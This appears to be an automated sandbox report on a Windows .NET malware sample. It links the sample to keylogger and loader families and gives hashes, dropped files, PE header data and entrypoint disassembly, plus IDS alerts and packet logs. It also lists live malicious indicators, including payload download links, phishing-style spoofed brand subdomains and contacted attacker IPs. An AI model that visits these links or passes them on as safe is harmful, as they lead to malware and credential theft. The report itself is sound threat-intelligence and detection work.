	New order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Orden de Compra..exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
188.114.96.3	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/v4mecse6/download
	Final Shipping Document.exe	Get hash	malicious	FormBook	Browse	www.artfulfusionhub.lat/qogc/
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/
	DHL Shipment Notification 490104998009.xls	Get hash	malicious	Remcos	Browse	tny.wtf/dg4Zx
	Purchase Inquiry.xla.xlsx	Get hash	malicious	Remcos	Browse	tny.wtf/c8lH8
	AWD 490104998518.xls	Get hash	malicious	Remcos	Browse	tny.wtf/sA
	waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	Get hash	malicious	GuLoader, Remcos	Browse	hq.ax/Oi8
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/dGa
	RFQ#51281AOLAI.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	tny.wtf/
	Quotation.xls	Get hash	malicious	Remcos	Browse	tny.wtf/jjJsPX

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	order072724.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
investdirectinsurance.com	Ycj3d5NMhc.exe	Get hash	malicious	Unknown	Browse	104.21.65.79
	SWIFT.exe	Get hash	malicious	Lokibot	Browse	104.21.65.79
	SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exe	Get hash	malicious	Lokibot	Browse	104.21.65.79
checkip.dyndns.com	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	order072724.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	New order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
fp2e7a.wpc.phicdn.net	Ycj3d5NMhc.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.229.221.95
	https://azadengg.com/MTQwOTk4NzcwMg==sfmaxWjJWdUxYQm5lQzA0TXpVMU1EZ3dNMmxtZUdOb1lYWmxlbkpwYzNoaGFYSmliM0p1TG1OdmJRPT0=&c=E,1,LZxP3HHb1f9qSYvI9qirqXkUUBAc_Lly3K7xLwNdfYOBECyaKUoAd-t3gcHqWT79cExKeBU56i8wGFRIGcXn5xtHq6aoS1GJuvxV76lYjLuWHw,,&typo=1	Get hash	malicious	Unknown	Browse	192.229.221.95
	x.ps1	Get hash	malicious	Unknown	Browse	192.229.221.95
	invoker.ps1	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://investors.spotify.com.th.wuush.us.kg/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://investors.spotify.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://cache.netflix.com.sg3.wuush.us.kg/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://apple.vn377.com/	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	order072724.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	New order.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	http://docusign.net	Get hash	malicious	Unknown	Browse	192.29.14.118
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
CLOUDFLARENETUS	41DLTjkmOm.exe	Get hash	malicious	Remcos	Browse	172.67.189.102
	Ycj3d5NMhc.exe	Get hash	malicious	Unknown	Browse	104.21.65.79
	rwsNDpQSKZ.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	CBS_applcation_details_072602024_xlsx.js	Get hash	malicious	WSHRAT	Browse	188.114.96.3
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	8SxJ9aYfJ1.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.96.3
	https://www.kudoboard.com/boards/ZWwsi9jg	Get hash	malicious	Unknown	Browse	172.67.37.149
CLOUDFLARENETUS	41DLTjkmOm.exe	Get hash	malicious	Remcos	Browse	172.67.189.102
	Ycj3d5NMhc.exe	Get hash	malicious	Unknown	Browse	104.21.65.79
	rwsNDpQSKZ.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	CBS_applcation_details_072602024_xlsx.js	Get hash	malicious	WSHRAT	Browse	188.114.96.3
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	8SxJ9aYfJ1.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.96.3
	https://www.kudoboard.com/boards/ZWwsi9jg	Get hash	malicious	Unknown	Browse	172.67.37.149

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	New Order.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	LisectAVT_2403002B_361.exe	Get hash	malicious	Quasar	Browse	188.114.96.3
	SWIFT.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
37f463bf4616ecd445d4a1937da06e19	41DLTjkmOm.exe	Get hash	malicious	Remcos	Browse	172.67.189.102
	Ycj3d5NMhc.exe	Get hash	malicious	Unknown	Browse	172.67.189.102
	CBS_applcation_details_072602024_xlsx.js	Get hash	malicious	WSHRAT	Browse	172.67.189.102
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	172.67.189.102
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	172.67.189.102
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	172.67.189.102
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	172.67.189.102
	PO Tournefortian2453525525235235623425523235.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.189.102
	setup.exe	Get hash	malicious	Amadey	Browse	172.67.189.102
	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	172.67.189.102

Process:	C:\Users\user\Desktop\R86BRY7DdC.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Victim_SID[1].bd

Download File

Process:	C:\Users\user\Desktop\R86BRY7DdC.exe
File Type:	data
Category:	dropped
Size (bytes):	47616
Entropy (8bit):	7.3984749546983055
Encrypted:	false
SSDEEP:	768:bRinnuikZHazYr+sPVlc1/Sdi0bNxf6lj1rEpBdE4DYywm9Tpfb+pSuGmyZCQrUz:cnpkZHIcs1/rBLDmRBbCqZCQIsPS
MD5:	3E3D6FD0B466B60CA1E91DC596C05DF3
SHA1:	9E09372C4597A6405DF167DFE5C2671F1F62A706
SHA-256:	8F60AA9F4D6672F149B1873CBDB398600A3250019A3CDBB000814C23B92E7C8E
SHA-512:	FA052957886D4998773AFF3329D3154911DA49D8302E8EC617BBCECF32C4B10552001BE57FDCF0A99CFC1139978B23CE7C35827780E789C2CFA9A3E3F2A179A5
Malicious:	false
Reputation:	low
Preview:	..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.>.s...je..G..DX...<ks.\X.B.j.\|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY\|.....L.pLY.l..!..GA.L+.:..w3nx.j...L..LYZL+7Ll.L..LY.L~PL.....L+.Y....1....r;.k.LY.L+.h)\L..LY.L~bZN.LYQL+8Ll.L..LY.L~.....U.L+DLl.L.....L~.L..LY..i.LlVL..LY.L~.L....oL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll...LY/L~.L.,LYdL+.Ll.L..LY..=kL.LY.L+e.H.L.PLY.L~.L..LY.L+...SL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Ll.L.i.U~L~.L.9..7L+.LlfL..LYa.>9L.#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LYEM-Ll.L..).L~KL.LY.L+.Ll?L.`LY{L~.L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Ebagelog[1].bd

Download File

Process:	C:\Users\user\Desktop\R86BRY7DdC.exe
File Type:	data
Category:	dropped
Size (bytes):	400896
Entropy (8bit):	7.485818194995349
Encrypted:	false
SSDEEP:	6144:kezaT+J0CyGxSuWvmCOX0P/R5GqWtfIWcklvVvZjrJvuaG9ZlSvMhweOghtwL5mu:oayGxSz/RWfPptZjrcH9W1Map
MD5:	0F29EAAB32B1A3642F3A1C9779E07CA9
SHA1:	1D16FED2305B264C2F59472A34A5D79E5B90EFC2
SHA-256:	44A5B6AB678DB0E08A09B495A78784903F84365CDB768DEE72AA15EDCA170665
SHA-512:	0D707D523A2B4907F7D8B03A911A93317E919AAA9FF1227AB0EA9FE537D685F6D1970B793111491092885EC78889D8870F77F04C5AC00B0C01F7C9DA8FC88459
Malicious:	false
Reputation:	low
Preview:	..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.>.s...je..G..DX...<ks.\X.B.j.\|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY\|.....L.pLY.l..!..GA.L+"...W.$$c.j..L..LYZL+7Ll.L..LY.L~PL.....L+[.H.f.1....rx.).LY.L+...tf..LY.L~5...LYQL+8Ll.L..LY.L~.......).DLl.L.....L~.L..LY..j..HVL..LY.L~.N..LYoL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll.\|..LY/L~.L.,LYdL+.Ll.L..LY..>_k~.LY.L+e.H.L.PLY.L~.L..LY.L+..HSL..N[.VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Ll.}.....Z.L..'a7L+.LlfL..LYc.<.k~#LY......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LYGN(9.H.L..).L~KL.LY.L+.Ll?L.`LY{L~.L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.5610483430148685
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	R86BRY7DdC.exe
File size:	294'400 bytes
MD5:	d747188c998cbd80a03250d578236e29
SHA1:	cb2aff28e4271a441d0e55dce58783fb224902ab
SHA256:	728aacf77f919b92f4bc04b4dec7898345dc57f0080fe09f16290ce424671767
SHA512:	569acb73c8d233d08bc5d803e19cecf9995850d85c46812a490c23360d376bf4bccc036310832b57e589bc286aa3226b035ec248ec76b35d2c10ed4074f4e205
SSDEEP:	3072:hOlcp8wD7b6DhT4PrzD8VHCydY+pkzDqVHzYdKwDdomYcQGqKfjlOj0EdZdzdAHX:ICpDGFT4QndzYdKwDdomXfjc0EH2
TLSH:	56548DA033A8C42AD6EF177650F056946735A9425741EB5E38DE38DC4FA67030F22BBB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p.f.................z..........^.... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x44985e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A3701C [Fri Jul 26 09:45:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0044986Ch]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
cwde
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sbb al, 70h
mov dword ptr [00000066h], eax
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [eax+eax+00h], cl
add byte ptr [eax-6FFFFB68h], dl
jp 00007FFACD180776h
add byte ptr [edx+53h], dl
inc esp
push ebx
imul esi, dword ptr [ebx+7Ah], B4233199h
dec ebx
stosd
jle 00007FFACD1807DEh
push edx
dec dword ptr [edi+esi*2+000001F7h]
add byte ptr [ebx+3Ah], al
pop esp
push ebp
jnc 00007FFACD1807D7h
jc 00007FFACD1807E5h
pop esp
inc ecx
insd
imul ebp, dword ptr [esi+69h], 61727473h
je 00007FFACD1807E1h
jc 00007FFACD1807CEh
inc esp
jnc 00007FFACD1807DEh
je 00007FFACD1807E1h
jo 00007FFACD1807CEh
dec edi
jne 00007FFACD1807E6h
jo 00007FFACD1807E7h
je 00007FFACD1807E5h
pop esp
inc ecx
bound ebp, dword ptr [eax+65h]
imul ebp, dword ptr [ecx+73h], 6Fh
jo 00007FFACD1807D7h
bound eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x49810	0x4c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x49874	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4986c	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x478dc	0x47a00	c48136579667a30785fd5d14c5d507d0	False	0.4609613601657941	data	6.572522382489345	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x4a000	0xc	0x200	eeaea06bc089e27011c9604df831d8a6	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T11:39:07.740293+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49732	80	192.168.2.4	193.122.6.168
2024-07-27T11:39:11.959037+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49735	80	192.168.2.4	193.122.6.168
2024-07-27T11:39:08.709920+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49732	80	192.168.2.4	193.122.6.168
2024-07-27T11:39:02.041719+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	49731	443	192.168.2.4	172.67.189.102
2024-07-27T11:39:00.794915+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	49730	443	192.168.2.4	172.67.189.102
2024-07-27T11:39:10.262138+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49734	443	192.168.2.4	188.114.96.3
2024-07-27T11:39:57.966819+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49752	40.68.123.157	192.168.2.4
2024-07-27T11:39:19.816051+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49740	40.68.123.157	192.168.2.4
2024-07-27T11:39:12.575107+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49736	443	192.168.2.4	188.114.96.3
2024-07-27T11:39:15.631472+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49738	443	192.168.2.4	188.114.96.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 11:38:54.896601915 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 27, 2024 11:38:59.938163996 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:38:59.938208103 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:38:59.938290119 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:38:59.943130970 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:38:59.943140030 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.462336063 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.462559938 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.510560036 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.510581017 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.510962009 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.511049986 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.513142109 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.560529947 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.794889927 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.794931889 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.794964075 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.794986963 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.794998884 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.795053959 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.796227932 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.796293974 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.796300888 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.796513081 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.797801018 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.798243999 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.799299955 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.800508022 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.800517082 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.800574064 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.800873041 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.800926924 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.800934076 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.801446915 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.802386045 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.802522898 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.802530050 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.803088903 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.877005100 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.877068996 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.886984110 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.887039900 CEST	49730	443	192.168.2.4	172.67.189.102
Jul 27, 2024 11:39:00.887051105 CEST	443	49730	172.67.189.102	192.168.2.4
Jul 27, 2024 11:39:00.887624979 CEST	49730	443	192.168.2.4	172.67.189.102
